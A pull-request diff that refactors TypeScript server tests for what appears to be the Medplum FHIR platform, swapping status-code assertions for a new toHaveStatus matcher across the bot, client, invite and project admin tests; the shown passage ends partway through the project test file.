### PR TITLE
Use new expect().toHaveStatus() matcher in tests

### DIFF
--- a/packages/server/src/admin/bot.test.ts
+++ b/packages/server/src/admin/bot.test.ts
@@ -41,7 +41,7 @@ describe('Bot admin', () => {
         name: 'Alice personal bot',
         description: 'Alice bot description',
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.resourceType).toBe('Bot');
     expect(res2.body.id).toBeDefined();
     expect(res2.body.code).toBeUndefined();
@@ -51,7 +51,7 @@ describe('Bot admin', () => {
     const res3 = await request(app)
       .get('/fhir/R4/Bot/' + res2.body.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.resourceType).toBe('Bot');
     expect(res3.body.id).toBe(res2.body.id);
 
@@ -61,6 +61,6 @@ describe('Bot admin', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .type('json')
       .send({ foo: 'bar' });
-    expect(res4.status).toBe(400);
+    expect(res4).toHaveStatus(400);
   });
 });

--- a/packages/server/src/admin/client.test.ts
+++ b/packages/server/src/admin/client.test.ts
@@ -43,7 +43,7 @@ describe('Client admin', () => {
         name: 'Alice personal client',
         description: 'Alice client description',
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.resourceType).toBe('ClientApplication');
     expect(res2.body.id).toBeDefined();
     expect(res2.body.secret).toHaveLength(64);
@@ -52,7 +52,7 @@ describe('Client admin', () => {
     const res3 = await request(app)
       .get('/fhir/R4/ClientApplication/' + res2.body.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.resourceType).toBe('ClientApplication');
     expect(res3.body.id).toBe(res2.body.id);
 
@@ -62,7 +62,7 @@ describe('Client admin', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .type('json')
       .send({ foo: 'bar' });
-    expect(res4.status).toBe(400);
+    expect(res4).toHaveStatus(400);
   });
 
   test('Create client as superadmin - verify projectID', async () => {
@@ -78,7 +78,7 @@ describe('Client admin', () => {
         description: 'A client for testing creating a client with superadmin privileges.',
       });
 
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     expect((res.body as ClientApplication).resourceType).toBe('ClientApplication');
     expect((res.body as ClientApplication).id).toBeDefined();
 
@@ -86,7 +86,7 @@ describe('Client admin', () => {
     const res2 = await request(app)
       .get('/fhir/R4/ProjectMembership?profile=' + getReferenceString(res.body as ClientApplication))
       .set('Authorization', 'Bearer ' + superAdminAccessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toBe('Bundle');
 
     // Find the membership

--- a/packages/server/src/admin/invite.test.ts
+++ b/packages/server/src/admin/invite.test.ts
@@ -98,7 +98,7 @@ describe('Admin Invite', () => {
         email: bobEmail,
       });
 
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.invitedBy).toMatchObject(createReference(aliceUser));
     expect(mockSESv2Client.send.callCount).toBe(1);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
@@ -154,7 +154,7 @@ describe('Admin Invite', () => {
         email: bobEmail,
       });
 
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(mockSESv2Client.send.callCount).toBe(1);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
 
@@ -196,7 +196,7 @@ describe('Admin Invite', () => {
         name: [{ given: ['Bob'], family: 'Jones' }],
         telecom: [{ system: 'email', value: bobEmail }],
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.id).toBeDefined();
 
     // Third, Alice invites Bob to the project
@@ -212,7 +212,7 @@ describe('Admin Invite', () => {
         email: bobEmail,
       });
 
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.profile.reference).toStrictEqual(getReferenceString(res2.body));
 
     const rows = await new SelectQuery('User')
@@ -245,7 +245,7 @@ describe('Admin Invite', () => {
         resourceType: 'Practitioner',
         name: [{ given: ['Bob'], family: 'Jones' }],
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.id).toBeDefined();
 
     // Third, Alice invites Bob to the project
@@ -264,7 +264,7 @@ describe('Admin Invite', () => {
         },
       });
 
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.profile.reference).toStrictEqual(getReferenceString(res2.body));
 
     const rows = await new SelectQuery('User')
@@ -303,7 +303,7 @@ describe('Admin Invite', () => {
         email: `carol${randomUUID()}@example.com`,
       });
 
-    expect(res3.status).toBe(403);
+    expect(res3).toHaveStatus(403);
     expect(mockSESv2Client.send.callCount).toBe(0);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(0);
   });
@@ -333,7 +333,7 @@ describe('Admin Invite', () => {
         email: '',
       });
 
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue).toBeDefined();
     expect(mockSESv2Client.send.callCount).toBe(0);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(0);
@@ -364,7 +364,7 @@ describe('Admin Invite', () => {
         sendEmail: false,
       });
 
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(mockSESv2Client.send.callCount).toBe(0);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(0);
   });
@@ -396,7 +396,7 @@ describe('Admin Invite', () => {
         externalId: bobSub,
       });
 
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.profile.reference).toContain('Patient/');
     expect(res2.body.admin).toBe(undefined);
     expect(mockSESv2Client.send.callCount).toBe(0);
@@ -433,7 +433,7 @@ describe('Admin Invite', () => {
         externalId: bobSub,
       });
 
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Third, Alice tries to invite Carol to the project with the same externalId
     // This should fail
@@ -448,7 +448,7 @@ describe('Admin Invite', () => {
         externalId: carolSub,
       });
 
-    expect(res3.status).toBe(409);
+    expect(res3).toHaveStatus(409);
     expect(res3.body.issue[0].details.text).toMatch(/already exists/);
   });
 
@@ -475,7 +475,7 @@ describe('Admin Invite', () => {
         lastName: 'Jones',
         externalId: bobSub,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.profile.reference).toContain('Patient/');
 
     // Delete the ProjectMembership
@@ -485,7 +485,7 @@ describe('Admin Invite', () => {
       .delete('/fhir/R4/ProjectMembership/' + res2.body.id)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({});
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     // Alice invites Bob to the project again
     // Make sure that we can reuse the same externalId
@@ -498,7 +498,7 @@ describe('Admin Invite', () => {
         lastName: 'Jones',
         externalId: bobSub,
       });
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.profile.reference).toContain('Patient/');
   });
 
@@ -518,7 +518,7 @@ describe('Admin Invite', () => {
     const res2 = await request(app)
       .get('/fhir/R4/ProjectMembership?profile=' + getReferenceString(client))
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const clientMembership = res2.body.entry.find(
       (e: BundleEntry<ProjectMembership>) => e.resource?.profile?.reference === getReferenceString(client)
@@ -529,7 +529,7 @@ describe('Admin Invite', () => {
     const res4 = await request(app)
       .get('/admin/projects/' + project.id + '/members/' + clientMembership.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
 
     // Promote the client to admin
     const res7 = await request(app)
@@ -540,7 +540,7 @@ describe('Admin Invite', () => {
         ...res4.body,
         admin: true,
       });
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
 
     // Call the invite endpoint as the client
     const bobEmail = `bob${randomUUID()}@example.com`;
@@ -554,7 +554,7 @@ describe('Admin Invite', () => {
         lastName: 'Jones',
         email: bobEmail,
       });
-    expect(res8.status).toBe(200);
+    expect(res8).toHaveStatus(200);
     expect(res8.body.profile.reference).toContain('Patient/');
   });
 
@@ -582,7 +582,7 @@ describe('Admin Invite', () => {
         email: bobEmail,
         admin: true,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.admin).toBe(true);
     expect(mockSESv2Client.send.callCount).toBe(1);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
@@ -618,7 +618,7 @@ describe('Admin Invite', () => {
         email: bobEmail,
         admin: false,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.admin).toBe(false);
     expect(mockSESv2Client.send.callCount).toBe(1);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
@@ -649,7 +649,7 @@ describe('Admin Invite', () => {
         lastName: 'Jones',
         email: bobEmail,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(mockSESv2Client.send.callCount).toBe(1);
     expect(res2.body.issue?.[0].details.text).toBe('Could not send email. Make sure you have AWS SES set up.');
   });
@@ -678,7 +678,7 @@ describe('Admin Invite', () => {
         email: `bob${randomUUID()}@example.com`,
         sendEmail: false,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect((res.body as ProjectMembership).project?.reference).toBe(getReferenceString(aliceRegistration.project));
   });
 
@@ -707,7 +707,7 @@ describe('Admin Invite', () => {
         email: upperBobEmail,
       });
 
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.user.display).toBe(lowerBobEmail);
     expect(mockSESv2Client.send.callCount).toBe(1);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
@@ -742,7 +742,7 @@ describe('Admin Invite', () => {
         lastName: 'Jones',
         email: bobEmail,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toBe('ProjectMembership');
 
     // Invite Bob second time - should fail
@@ -755,7 +755,7 @@ describe('Admin Invite', () => {
         lastName: 'Jones',
         email: bobEmail,
       });
-    expect(res3.status).toBe(409);
+    expect(res3).toHaveStatus(409);
     expect(normalizeErrorString(res3.body)).toStrictEqual('User is already a member of this project');
 
     // Invite Bob third time with "upsert = true" - should succeed
@@ -769,7 +769,7 @@ describe('Admin Invite', () => {
         email: bobEmail,
         upsert: true,
       });
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.resourceType).toBe('ProjectMembership');
     expect(res4.body.id).toStrictEqual(res2.body.id);
     expect(res4.body.invitedBy).toBeDefined();
@@ -786,7 +786,7 @@ describe('Admin Invite', () => {
         upsert: true,
         membership: { profile: createReference(profile) },
       });
-    expect(res5.status).toBe(409);
+    expect(res5).toHaveStatus(409);
     expect(normalizeErrorString(res5.body)).toStrictEqual(
       'User is already a member of this project with a different profile'
     );
@@ -802,7 +802,7 @@ describe('Admin Invite', () => {
         email: bobEmail,
         forceNewMembership: true,
       });
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     expect(res6.body.resourceType).toBe('ProjectMembership');
     expect(res6.body.id).not.toStrictEqual(res2.body.id);
   });
@@ -829,7 +829,7 @@ describe('Admin Invite', () => {
         lastName: 'Jones',
         email: bobEmail,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toBe('ProjectMembership');
 
     // Invite Bob second time as project scoped user - should fail
@@ -843,7 +843,7 @@ describe('Admin Invite', () => {
         email: bobEmail,
         scope: 'project',
       });
-    expect(res3.status).toBe(409);
+    expect(res3).toHaveStatus(409);
     expect(normalizeErrorString(res3.body)).toStrictEqual('User is already a member of this project');
   });
 
@@ -870,7 +870,7 @@ describe('Admin Invite', () => {
         email: bobEmail,
         scope: 'project',
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toBe('ProjectMembership');
 
     // Invite Bob second time as server-scoped user - should fail
@@ -883,7 +883,7 @@ describe('Admin Invite', () => {
         lastName: 'Jones',
         email: bobEmail,
       });
-    expect(res3.status).toBe(409);
+    expect(res3).toHaveStatus(409);
     expect(normalizeErrorString(res3.body)).toStrictEqual('User is already a member of this project');
   });
 
@@ -909,7 +909,7 @@ describe('Admin Invite', () => {
         lastName: 'Jones',
         email: bobEmail,
       });
-    expect(resBob1.status).toBe(200);
+    expect(resBob1).toHaveStatus(200);
     expect(resBob1.body.resourceType).toBe('ProjectMembership');
 
     const resBob2 = await request(app)
@@ -922,7 +922,7 @@ describe('Admin Invite', () => {
         email: bobEmail,
         forceNewMembership: true,
       });
-    expect(resBob2.status).toBe(200);
+    expect(resBob2).toHaveStatus(200);
     expect(resBob2.body.resourceType).toBe('ProjectMembership');
     expect(resBob2.body.id).not.toStrictEqual(resBob1.body.id);
 
@@ -937,7 +937,7 @@ describe('Admin Invite', () => {
         lastName: 'Jones',
         email: jackEmail,
       });
-    expect(resJack1.status).toBe(200);
+    expect(resJack1).toHaveStatus(200);
     expect(resJack1.body.resourceType).toBe('ProjectMembership');
 
     const resJack2 = await request(app)
@@ -950,7 +950,7 @@ describe('Admin Invite', () => {
         email: jackEmail,
         forceNewMembership: true,
       });
-    expect(resJack2.status).toBe(200);
+    expect(resJack2).toHaveStatus(200);
     expect(resJack2.body.resourceType).toBe('ProjectMembership');
     expect(resJack2.body.id).not.toStrictEqual(resJack1.body.id);
 
@@ -966,7 +966,7 @@ describe('Admin Invite', () => {
         email: jillEmail,
         scope: 'project',
       });
-    expect(resJill1.status).toBe(200);
+    expect(resJill1).toHaveStatus(200);
     expect(resJill1.body.resourceType).toBe('ProjectMembership');
 
     const resJill2 = await request(app)
@@ -980,7 +980,7 @@ describe('Admin Invite', () => {
         scope: 'project',
         forceNewMembership: true,
       });
-    expect(resJill2.status).toBe(200);
+    expect(resJill2).toHaveStatus(200);
     expect(resJill2.body.resourceType).toBe('ProjectMembership');
     expect(resJill2.body.id).not.toStrictEqual(resJill1.body.id);
 
@@ -995,7 +995,7 @@ describe('Admin Invite', () => {
         lastName: 'Jones',
         email: camEmail,
       });
-    expect(resCam1.status).toBe(200);
+    expect(resCam1).toHaveStatus(200);
     expect(resCam1.body.resourceType).toBe('ProjectMembership');
 
     const resCam2 = await request(app)
@@ -1009,7 +1009,7 @@ describe('Admin Invite', () => {
         scope: 'project',
         forceNewMembership: true,
       });
-    expect(resCam2.status).toBe(200);
+    expect(resCam2).toHaveStatus(200);
     expect(resCam2.body.resourceType).toBe('ProjectMembership');
     expect(resCam2.body.id).not.toStrictEqual(resCam1.body.id);
 
@@ -1024,7 +1024,7 @@ describe('Admin Invite', () => {
         lastName: 'Jones',
         email: tomEmail,
       });
-    expect(resTom1.status).toBe(200);
+    expect(resTom1).toHaveStatus(200);
     expect(resTom1.body.resourceType).toBe('ProjectMembership');
 
     const resTom2 = await request(app)
@@ -1038,7 +1038,7 @@ describe('Admin Invite', () => {
         scope: 'project',
         forceNewMembership: true,
       });
-    expect(resTom2.status).toBe(200);
+    expect(resTom2).toHaveStatus(200);
     expect(resTom2.body.resourceType).toBe('ProjectMembership');
     expect(resTom2.body.id).not.toStrictEqual(resTom1.body.id);
   });
@@ -1067,11 +1067,11 @@ describe('Admin Invite', () => {
         scope: 'project',
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const res2 = await request(app)
       .get('/fhir/R4/User?email=' + bobEmail)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     const user = res2.body.entry[0].resource;
     expect(user.resourceType).toBe('User');
     expect(user.project.reference).toBe(getReferenceString(project));
@@ -1101,11 +1101,11 @@ describe('Admin Invite', () => {
         scope: 'server',
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const res2 = await request(app)
       .get('/fhir/R4/User?email=' + bobEmail)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toBe('Bundle');
     expect(res2.body.entry).toBeUndefined();
   });
@@ -1135,7 +1135,7 @@ describe('Admin Invite', () => {
         mfaRequired: true,
       });
 
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(mockSESv2Client.send.callCount).toBe(1);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
 
@@ -1161,7 +1161,7 @@ describe('Admin Invite', () => {
       secret: setPasswordSecret,
       password: bobPassword,
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toMatchObject(allOk);
 
     // Start new login
@@ -1170,7 +1170,7 @@ describe('Admin Invite', () => {
       password: bobPassword,
       scope: 'openid',
     });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.login).toBeDefined();
     expect(res3.body.mfaEnrollRequired).toBe(true);
     expect(res3.body.enrollUri).toBeDefined();
@@ -1184,7 +1184,7 @@ describe('Admin Invite', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ login: res3.body.login, token: 'invalid' });
-    expect(res4.status).toBe(400);
+    expect(res4).toHaveStatus(400);
     expect(res4.body.issue[0].details.text).toBe('Invalid MFA token');
 
     // Enroll with actual token, should succeed
@@ -1193,7 +1193,7 @@ describe('Admin Invite', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ login: res3.body.login, token: authenticator.generate(secret) });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     expect(res5.body.login).toBeDefined();
     expect(res5.body.code).toBeDefined();
 
@@ -1203,7 +1203,7 @@ describe('Admin Invite', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ login: res3.body.login, token: authenticator.generate(secret) });
-    expect(res6.status).toBe(400);
+    expect(res6).toHaveStatus(400);
     expect(res6.body.issue[0].details.text).toBe('Already enrolled');
   });
 
@@ -1227,7 +1227,7 @@ describe('Admin Invite', () => {
         resourceType: 'AccessPolicy',
         resource: [{ resourceType: 'Patient' }],
       });
-    expect(accessPolicyRes.status).toBe(201);
+    expect(accessPolicyRes).toHaveStatus(201);
     const accessPolicy = accessPolicyRes.body;
 
     // Invite Bob with the valid access policy
@@ -1244,7 +1244,7 @@ describe('Admin Invite', () => {
         sendEmail: false,
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('ProjectMembership');
     expect(res.body.accessPolicy?.reference).toBe(getReferenceString(accessPolicy));
   });
@@ -1275,7 +1275,7 @@ describe('Admin Invite', () => {
         sendEmail: false,
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(normalizeErrorString(res.body)).toContain('Access policy');
     expect(normalizeErrorString(res.body)).toContain('does not exist');
@@ -1302,7 +1302,7 @@ describe('Admin Invite', () => {
         resourceType: 'AccessPolicy',
         resource: [{ resourceType: 'Patient' }],
       });
-    expect(accessPolicyRes.status).toBe(201);
+    expect(accessPolicyRes).toHaveStatus(201);
     const accessPolicy = accessPolicyRes.body;
 
     // Create second project with Bob
@@ -1330,7 +1330,7 @@ describe('Admin Invite', () => {
         sendEmail: false,
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(normalizeErrorString(res.body)).toContain('Access policy');
     expect(normalizeErrorString(res.body)).toContain('does not belong to this project');
@@ -1361,7 +1361,7 @@ describe('Admin Invite', () => {
         sendEmail: false,
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('ProjectMembership');
   });
 
@@ -1385,7 +1385,7 @@ describe('Admin Invite', () => {
         resourceType: 'AccessPolicy',
         resource: [{ resourceType: 'Patient' }],
       });
-    expect(accessPolicyRes.status).toBe(201);
+    expect(accessPolicyRes).toHaveStatus(201);
     const validAccessPolicy = accessPolicyRes.body;
 
     // Try to invite with access array containing both valid and invalid policies
@@ -1406,7 +1406,7 @@ describe('Admin Invite', () => {
         sendEmail: false,
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(normalizeErrorString(res.body)).toContain('Access policy');
     expect(normalizeErrorString(res.body)).toContain('does not exist');
@@ -1440,7 +1440,7 @@ describe('Admin Invite', () => {
         sendEmail: false,
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(normalizeErrorString(res.body)).toContain('Access policy');
     expect(normalizeErrorString(res.body)).toContain('does not exist');
@@ -1470,14 +1470,14 @@ describe('Admin Invite', () => {
         sendEmail: false,
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('ProjectMembership');
 
     // Server-scoped user should NOT be visible from the project context
     const res2 = await request(app)
       .get('/fhir/R4/User?email=' + bobEmail)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toBe('Bundle');
     expect(res2.body.entry).toBeUndefined();
   });
@@ -1505,13 +1505,13 @@ describe('Admin Invite', () => {
         sendEmail: false,
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // Project-scoped user should be visible from the project context
     const res2 = await request(app)
       .get('/fhir/R4/User?email=' + bobEmail)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     const user = res2.body.entry[0].resource;
     expect(user.resourceType).toBe('User');
     expect(user.project?.reference).toBe(getReferenceString(project));
@@ -1541,7 +1541,7 @@ describe('Admin Invite', () => {
         email: bobEmail,
         sendEmail: false,
       });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     // Invite Bob again as server-scoped Patient - should fail (different scope, same project)
     const res2 = await request(app)
@@ -1555,7 +1555,7 @@ describe('Admin Invite', () => {
         scope: 'server',
         sendEmail: false,
       });
-    expect(res2.status).toBe(409);
+    expect(res2).toHaveStatus(409);
     expect(normalizeErrorString(res2.body)).toStrictEqual('User is already a member of this project');
   });
 
@@ -1800,7 +1800,7 @@ describe('Admin Invite', () => {
         sendEmail: false,
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.profile).toMatchObject(createReference(relatedPerson));
   });
 
@@ -1849,7 +1849,7 @@ describe('Admin Invite', () => {
         sendEmail: false,
       });
 
-    expect(res.status).toBe(412);
+    expect(res).toHaveStatus(412);
     expect(res.body.issue?.[0]?.code).toStrictEqual('multiple-matches');
   });
 

--- a/packages/server/src/admin/project.test.ts
+++ b/packages/server/src/admin/project.test.ts
@@ -73,7 +73,7 @@ describe('Project Admin routes', () => {
         lastName: 'Jones',
         email: `bob${randomUUID()}@example.com`,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Get the project details
     // Make sure the new member is in the members list
@@ -83,7 +83,7 @@ describe('Project Admin routes', () => {
       .get('/fhir/R4/ProjectMembership')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('X-Medplum', 'extended');
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.entry).toBeDefined();
     expect(res3.body.entry.length).toStrictEqual(3);
 
@@ -99,7 +99,7 @@ describe('Project Admin routes', () => {
       .get('/admin/projects/' + project.id + '/members/' + member.id)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('X-Medplum', 'extended');
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.resourceType).toStrictEqual('ProjectMembership');
     expect(res4.body.id).toBeDefined();
     expect(res4.body.meta.project).toStrictEqual(project.id);
@@ -112,7 +112,7 @@ describe('Project Admin routes', () => {
       .send({
         resourceType: 'Patient',
       });
-    expect(res5.status).toBe(403);
+    expect(res5).toHaveStatus(403);
 
     // Try a naughty request using a different membership
     const res6 = await request(app)
@@ -123,7 +123,7 @@ describe('Project Admin routes', () => {
         resourceType: 'ProjectMembership',
         id: randomUUID(),
       });
-    expect(res6.status).toBe(403);
+    expect(res6).toHaveStatus(403);
 
     // Promote the new member to admin
     const res7 = await request(app)
@@ -135,14 +135,14 @@ describe('Project Admin routes', () => {
         ...res4.body,
         admin: true,
       });
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
     expect(res7.body.meta?.author?.reference).toStrictEqual(owner?.profile?.reference);
 
     // Make sure the new member is an admin
     const res8 = await request(app)
       .get('/fhir/R4/ProjectMembership/' + member.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res8.status).toBe(200);
+    expect(res8).toHaveStatus(200);
     expect(res8.body.admin).toBe(true);
   });
 
@@ -167,13 +167,13 @@ describe('Project Admin routes', () => {
       .get('/admin/projects/' + aliceRegistration.project.id)
       .set('Authorization', 'Bearer ' + aliceRegistration.accessToken);
 
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     // Try to access Alice's project members using Alices's access token
     const membersRes = await request(app)
       .get('/fhir/R4/ProjectMembership')
       .set('Authorization', 'Bearer ' + aliceRegistration.accessToken);
-    expect(membersRes.status).toBe(200);
+    expect(membersRes).toHaveStatus(200);
     const members = membersRes.body.entry.map((e: any) => e.resource) as ProjectMembership[];
 
     // Try to access Alice's project using Bob's access token
@@ -182,7 +182,7 @@ describe('Project Admin routes', () => {
       .get('/admin/projects/' + aliceRegistration.project.id)
       .set('Authorization', 'Bearer ' + bobRegistration.accessToken);
 
-    expect(res4.status).toBe(403);
+    expect(res4).toHaveStatus(403);
 
     // Try to access Alice's project members using Bob's access token
     // Should fail
@@ -190,7 +190,7 @@ describe('Project Admin routes', () => {
       .get('/admin/projects/' + aliceRegistration.project.id + '/members/' + members[0].id)
       .set('Authorization', 'Bearer ' + bobRegistration.accessToken);
 
-    expect(res5.status).toBe(403);
+    expect(res5).toHaveStatus(403);
 
     // Try to edit Alice's project members using Bob's access token
     // Should fail
@@ -200,7 +200,7 @@ describe('Project Admin routes', () => {
       .type('json')
       .send({ resourceType: 'ProjectMembership' });
 
-    expect(res6.status).toBe(403);
+    expect(res6).toHaveStatus(403);
 
     // Try to create a new client in Alice's project using Alices's access token
     // Should succeed
@@ -213,7 +213,7 @@ describe('Project Admin routes', () => {
         name: 'Test client',
       });
 
-    expect(res9.status).toBe(201);
+    expect(res9).toHaveStatus(201);
 
     const clientId = res9.body.id;
 
@@ -223,7 +223,7 @@ describe('Project Admin routes', () => {
       .get('/fhir/R4/ClientApplication/' + clientId)
       .set('Authorization', 'Bearer ' + aliceRegistration.accessToken);
 
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
 
     // Try to read Alice's client using Bob's access token
     // Should fail
@@ -231,7 +231,7 @@ describe('Project Admin routes', () => {
       .get('/fhir/R4/ClientApplication/' + clientId)
       .set('Authorization', 'Bearer ' + bobRegistration.accessToken);
 
-    expect(res8.status).toBe(403);
+    expect(res8).toHaveStatus(403);
 
     // Try to create a new client in Alice's project using Bob's access token
     // Should fail
@@ -239,7 +239,7 @@ describe('Project Admin routes', () => {
       .post('/admin/projects/' + aliceRegistration.project.id + '/client')
       .set('Authorization', 'Bearer ' + bobRegistration.accessToken);
 
-    expect(res10.status).toBe(403);
+    expect(res10).toHaveStatus(403);
 
     // Try to delete Alice's project members using Bob's access token
     // Should fail
@@ -247,7 +247,7 @@ describe('Project Admin routes', () => {
       .delete('/admin/projects/' + aliceRegistration.project.id + '/members/' + members[0].id)
       .set('Authorization', 'Bearer ' + bobRegistration.accessToken);
 
-    expect(res11.status).toBe(403);
+    expect(res11).toHaveStatus(403);
 
     // Try to create a bot using Bob's access token
     // Should fail
@@ -260,7 +260,7 @@ describe('Project Admin routes', () => {
         description: 'Alice bot description',
       });
 
-    expect(res12.status).toBe(403);
+    expect(res12).toHaveStatus(403);
 
     // Try to update secrets using Bob's access token
     // Should fail
@@ -275,7 +275,7 @@ describe('Project Admin routes', () => {
         },
       ]);
 
-    expect(res13.status).toBe(403);
+    expect(res13).toHaveStatus(403);
 
     // Try to update sites using Bob's access token
     // Should fail
@@ -290,7 +290,7 @@ describe('Project Admin routes', () => {
         },
       ]);
 
-    expect(res14.status).toBe(403);
+    expect(res14).toHaveStatus(403);
 
     // Try to update settings using Bob's access token
     // Should fail
@@ -305,7 +305,7 @@ describe('Project Admin routes', () => {
         },
       ]);
 
-    expect(res15.status).toBe(403);
+    expect(res15).toHaveStatus(403);
   });
 
   test('Delete membership', async () => {
@@ -330,7 +330,7 @@ describe('Project Admin routes', () => {
         lastName: 'Jones',
         email: `bob${randomUUID()}@example.com`,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Get the project details
     // Make sure the new member is in the members list
@@ -339,14 +339,14 @@ describe('Project Admin routes', () => {
     const res3 = await request(app)
       .get('/admin/projects/' + project.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.project).toBeDefined();
 
     // Try to access Alice's project members using Alices's access token
     const membersRes = await request(app)
       .get('/fhir/R4/ProjectMembership')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(membersRes.status).toBe(200);
